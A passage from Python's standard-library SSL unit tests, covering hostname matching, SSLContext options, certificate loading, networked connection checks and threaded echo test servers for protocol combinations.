cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
ok(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
cert = {'subject': ((('commonName', 'f*.com'),),)}
ok(cert, 'foo.com')
ok(cert, 'f.com')
fail(cert, 'bar.com')
fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# Slightly fake real-world example
cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
fail(cert, '<unsupported>')
# When there is a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName is considered
fail(cert, 'California')
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
# No DNS entry in subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
# No DNS entry subjectAltName and no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
def test_server_side(self):
# server_hostname doesn't work for server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with socket.socket() as sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
server_hostname="some.hostname")
class ContextTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_constructor(self):
if hasattr(ssl, 'PROTOCOL_SSLv2'):
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv2)
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv3)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(TypeError, ssl.SSLContext)
self.assertRaises(ValueError, ssl.SSLContext, -1)
self.assertRaises(ValueError, ssl.SSLContext, 42)
@skip_if_broken_ubuntu_ssl
def test_protocol(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.protocol, proto)
def test_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ciphers("ALL")
ctx.set_ciphers("DEFAULT")
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
ctx.set_ciphers("^$:,;?*'dorothyx")
@skip_if_broken_ubuntu_ssl
def test_options(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# OP_ALL is the default value
self.assertEqual(ssl.OP_ALL, ctx.options)
ctx.options |= ssl.OP_NO_SSLv2
self.assertEqual(ssl.OP_ALL | ssl.OP_NO_SSLv2,
ctx.options)
ctx.options |= ssl.OP_NO_SSLv3
self.assertEqual(ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3,
ctx.options)
if can_clear_options():
ctx.options = (ctx.options & ~ssl.OP_NO_SSLv2) | ssl.OP_NO_TLSv1
self.assertEqual(ssl.OP_ALL | ssl.OP_NO_TLSv1 | ssl.OP_NO_SSLv3,
ctx.options)
ctx.options = 0
self.assertEqual(0, ctx.options)
else:
with self.assertRaises(ValueError):
ctx.options = 0
def test_verify(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# Default value
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
ctx.verify_mode = ssl.CERT_OPTIONAL
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
with self.assertRaises(TypeError):
ctx.verify_mode = None
with self.assertRaises(ValueError):
ctx.verify_mode = 42
def test_load_cert_chain(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# Combined key and cert in a single file
ctx.load_cert_chain(CERTFILE)
ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
with self.assertRaises(IOError) as cm:
ctx.load_cert_chain(WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(BADCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(EMPTYCERT)
# Separate key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_cert_chain(ONLYCERT, ONLYKEY)
ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
# Mismatching key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with self.assertRaisesRegex(ssl.SSLError, "key values mismatch"):
ctx.load_cert_chain(SVN_PYTHON_ORG_ROOT_CERT, ONLYKEY)
def test_load_verify_locations(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_verify_locations(CERTFILE)
ctx.load_verify_locations(cafile=CERTFILE, capath=None)
ctx.load_verify_locations(BYTES_CERTFILE)
ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
self.assertRaises(TypeError, ctx.load_verify_locations)
self.assertRaises(TypeError, ctx.load_verify_locations, None, None)
with self.assertRaises(IOError) as cm:
ctx.load_verify_locations(WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_verify_locations(BADCERT)
ctx.load_verify_locations(CERTFILE, CAPATH)
ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
# Issue #10989: crash if the second argument type is invalid
self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
@skip_if_broken_ubuntu_ssl
def test_session_stats(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.session_stats(), {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
})
def test_set_default_verify_paths(self):
# There's not much we can do to test that it acts as expected,
# so just check it doesn't crash or raise an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_default_verify_paths()
class NetworkedTests(unittest.TestCase):
def test_connect(self):
with support.transient_internet("svn.python.org"):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE)
try:
s.connect(("svn.python.org", 443))
self.assertEqual({}, s.getpeercert())
finally:
s.close()
# this should fail because we have no verification certs
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, ("svn.python.org", 443))
s.close()
# this should succeed because we specify the root cert
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SVN_PYTHON_ORG_ROOT_CERT)
try:
s.connect(("svn.python.org", 443))
self.assertTrue(s.getpeercert())
finally:
s.close()
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
with support.transient_internet("svn.python.org"):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SVN_PYTHON_ORG_ROOT_CERT)
try:
self.assertEqual(0, s.connect_ex(("svn.python.org", 443)))
self.assertTrue(s.getpeercert())
finally:
s.close()
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
with support.transient_internet("svn.python.org"):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SVN_PYTHON_ORG_ROOT_CERT,
do_handshake_on_connect=False)
try:
s.setblocking(False)
rc = s.connect_ex(('svn.python.org', 443))
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLError as err:
if err.args[0] == ssl.SSL_ERROR_WANT_READ:
select.select([s], [], [], 5.0)
elif err.args[0] == ssl.SSL_ERROR_WANT_WRITE:
select.select([], [s], [], 5.0)
else:
raise
# SSL established
self.assertTrue(s.getpeercert())
finally:
s.close()
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with support.transient_internet("svn.python.org"):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SVN_PYTHON_ORG_ROOT_CERT,
do_handshake_on_connect=False)
try:
s.settimeout(0.0000001)
rc = s.connect_ex(('svn.python.org', 443))
if rc == 0:
self.skipTest("svn.python.org responded too quickly")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
finally:
s.close()
def test_connect_with_context(self):
with support.transient_internet("svn.python.org"):
# Same as test_connect, but with a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect(("svn.python.org", 443))
try:
self.assertEqual({}, s.getpeercert())
finally:
s.close()
# Same with a server hostname
s = ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="svn.python.org")
if ssl.HAS_SNI:
s.connect(("svn.python.org", 443))
s.close()
else:
self.assertRaises(ValueError, s.connect, ("svn.python.org", 443))
# This should fail because we have no verification certs
ctx.verify_mode = ssl.CERT_REQUIRED
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, ("svn.python.org", 443))
s.close()
# This should succeed because we specify the root cert
ctx.load_verify_locations(SVN_PYTHON_ORG_ROOT_CERT)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect(("svn.python.org", 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
# NOTE: the subject hashing algorithm has been changed between
# OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must
# contain both versions of each certificate (same content, different
# filename) for this test to be portable across OpenSSL releases.
with support.transient_internet("svn.python.org"):
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect(("svn.python.org", 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
# Same with a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=BYTES_CAPATH)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect(("svn.python.org", 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
with support.transient_internet("svn.python.org"):
ss = ssl.wrap_socket(socket.socket(socket.AF_INET))
ss.connect(("svn.python.org", 443))
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
with support.transient_internet("svn.python.org"):
s = socket.socket(socket.AF_INET)
s.connect(("svn.python.org", 443))
s.setblocking(False)
s = ssl.wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLError as err:
if err.args[0] == ssl.SSL_ERROR_WANT_READ:
select.select([s], [], [])
elif err.args[0] == ssl.SSL_ERROR_WANT_WRITE:
select.select([], [s], [])
else:
raise
s.close()
if support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
with support.transient_internet("svn.python.org"):
pem = ssl.get_server_certificate(("svn.python.org", 443))
if not pem:
self.fail("No server certificate on svn.python.org:443!")
try:
pem = ssl.get_server_certificate(("svn.python.org", 443), ca_certs=CERTFILE)
except ssl.SSLError as x:
#should fail
if support.verbose:
sys.stdout.write("%s\n" % x)
else:
self.fail("Got server certificate %s for svn.python.org!" % pem)
pem = ssl.get_server_certificate(("svn.python.org", 443), ca_certs=SVN_PYTHON_ORG_ROOT_CERT)
if not pem:
self.fail("No server certificate on svn.python.org:443!")
if support.verbose:
sys.stdout.write("\nVerified certificate for svn.python.org:443 is\n%s\n" % pem)
def test_ciphers(self):
remote = ("svn.python.org", 443)
with support.transient_internet(remote[0]):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL")
s.connect(remote)
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT")
s.connect(remote)
# Error checking can happen at instantiation or when connecting
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
with socket.socket(socket.AF_INET) as sock:
s = ssl.wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(remote)
def test_algorithms(self):
# Issue #8484: all algorithms should be available when verifying a
# certificate.
# SHA256 was added in OpenSSL 0.9.8
if ssl.OPENSSL_VERSION_INFO < (0, 9, 8, 0, 15):
self.skipTest("SHA256 not available on %r" % ssl.OPENSSL_VERSION)
# https://sha2.hboeck.de/ was used until 2011-01-08 (no route to host)
remote = ("sha256.tbs-internet.com", 443)
sha256_cert = os.path.join(os.path.dirname(__file__), "sha256.pem")
with support.transient_internet("sha256.tbs-internet.com"):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=sha256_cert,)
try:
s.connect(remote)
if support.verbose:
sys.stdout.write("\nCipher with %r is %r\n" %
(remote, s.cipher()))
sys.stdout.write("Certificate is:\n%s\n" %
pprint.pformat(s.getpeercert()))
finally:
s.close()
try:
import threading
except ImportError:
_have_threads = False
else:
_have_threads = True
from test.ssl_servers import make_https_server
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock, addr):
self.server = server
self.running = False
self.sock = connsock
self.addr = addr
self.sock.setblocking(1)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def wrap_conn(self):
try:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=True)
except ssl.SSLError:
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.server.stop()
self.close()
return False
else:
if self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if support.verbose and self.server.chatty:
sys.stdout.write(" cert binary is " + str(len(cert_binary)) + " bytes\n")
cipher = self.sslconn.cipher()
if support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
return True
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
def write(self, bytes):
if self.sslconn:
return self.sslconn.write(bytes)
else:
return self.sock.send(bytes)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock.close()
def run(self):
self.running = True
if not self.server.starttls_server:
if not self.wrap_conn():
return
while self.running:
try:
msg = self.read()
stripped = msg.strip()
if not stripped:
# eof, so quit this handler
self.running = False
self.close()
elif stripped == b'over':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif (self.server.starttls_server and
stripped == b'STARTTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write(b"OK\n")
if not self.wrap_conn():
return
elif (self.server.starttls_server and self.sslconn
and stripped == b'ENDTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = None
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
else:
if (support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
except socket.error:
if self.server.chatty:
handle_error("Test server failure:\n")
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate=None, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
ciphers=None, context=None):
if context:
self.context = context
else:
self.context = ssl.SSLContext(ssl_version
if ssl_version is not None
else ssl.PROTOCOL_TLSv1)
self.context.verify_mode = (certreqs if certreqs is not None
else ssl.CERT_NONE)
if cacerts:
self.context.load_verify_locations(cacerts)
if certificate:
self.context.load_cert_chain(certificate)
if ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = support.bind_port(self.sock)
self.flag = None
self.active = False
threading.Thread.__init__(self)
self.daemon = True
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.sock.settimeout(0.05)
self.sock.listen(5)
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
except socket.timeout:
pass
except KeyboardInterrupt:
self.stop()
self.sock.close()
def stop(self):
self.active = False
class AsyncoreEchoServer(threading.Thread):
# this one's based on asyncore.dispatcher
class EchoServer (asyncore.dispatcher):
class ConnectionHandler (asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = ssl.wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = True
self._do_ssl_handshake()
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return
elif err.args[0] == ssl.SSL_ERROR_EOF:
return self.handle_close()
raise
except socket.error as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if support.verbose:
sys.stdout.write(" server: read %s from client\n" % repr(data))
if not data:
self.close()
else:
self.send(data.lower())
def handle_close(self):
self.close()
if support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accepted(self, sock_obj, addr):
if support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def start (self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
try:
asyncore.loop(1)
except:
pass
def stop(self):
self.active = False
self.server.close()
def bad_cert_test(certfile):
"""
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with the given client certificate fails.
"""
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_REQUIRED,
cacerts=CERTFILE, chatty=False,
connectionchatty=False)
flag = threading.Event()
server.start(flag)
# wait for it to start
flag.wait()
# try to connect
try:
try:
with socket.socket() as sock:
s = ssl.wrap_socket(sock,
certfile=certfile,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
except ssl.SSLError as x:
if support.verbose:
sys.stdout.write("\nSSLError is %s\n" % x.args[1])
except socket.error as x:
if support.verbose:
sys.stdout.write("\nsocket.error is %s\n" % x.args[1])
except IOError as x:
if x.errno != errno.ENOENT:
raise
if support.verbose:
sys.stdout.write("\IOError is %s\n" % str(x))
else:
raise AssertionError("Use of invalid cert should have failed!")
finally:
server.stop()
server.join()
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=True, connectionchatty=False):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=False)
flag = threading.Event()
server.start(flag)
# wait for it to start
flag.wait()
# try to connect
try:
s = client_context.wrap_socket(socket.socket())
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
raise AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
finally:
server.stop()
server.join()
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=None, server_options=0, client_options=0):
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
client_context = ssl.SSLContext(client_protocol)
client_context.options = ssl.OP_ALL | client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options = ssl.OP_ALL | server_options
for ctx in (client_context, server_context):
ctx.verify_mode = certsreqs
# NOTE: we must enable "ALL" ciphers, otherwise an SSLv23 client
# will send an SSLv3 hello (rather than SSLv2) starting from
# OpenSSL 1.0.0 (see issue #8322).
ctx.set_ciphers("ALL")
ctx.load_cert_chain(CERTFILE)
ctx.load_verify_locations(CERTFILE)
try:
server_params_test(client_context, server_context,
chatty=False, connectionchatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except socket.error as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
class ThreadedTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if support.verbose:
sys.stdout.write("\n")
for protocol in PROTOCOLS:
context = ssl.SSLContext(protocol)
context.load_cert_chain(CERTFILE)
server_params_test(context, context,
chatty=True, connectionchatty=True)
def test_getpeercert(self):
if support.verbose:
sys.stdout.write("\n")
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
flag = threading.Event()
server.start(flag)
# wait for it to start
flag.wait()
# try to connect
try:
s = context.wrap_socket(socket.socket())
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
s.close()
finally:
server.stop()
server.join()
def test_empty_cert(self):
"""Connecting with an empty cert file"""
bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir,
"nullcert.pem"))
def test_malformed_cert(self):
"""Connecting with a badly formatted certificate (syntax error)"""
bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir,
"badcert.pem"))
def test_nonexisting_cert(self):
"""Connecting with a non-existing cert file"""
bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir,
"wrongcert.pem"))
def test_malformed_key(self):
"""Connecting with a badly formatted key (syntax error)"""
bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir,
"badkey.pem"))
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an IOError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = support.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen(5)
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with socket.socket() as c:
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = ssl.wrap_socket(c)
except IOError:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv2'), "need SSLv2")
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
# SSLv23 client with specific SSL options
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv2)
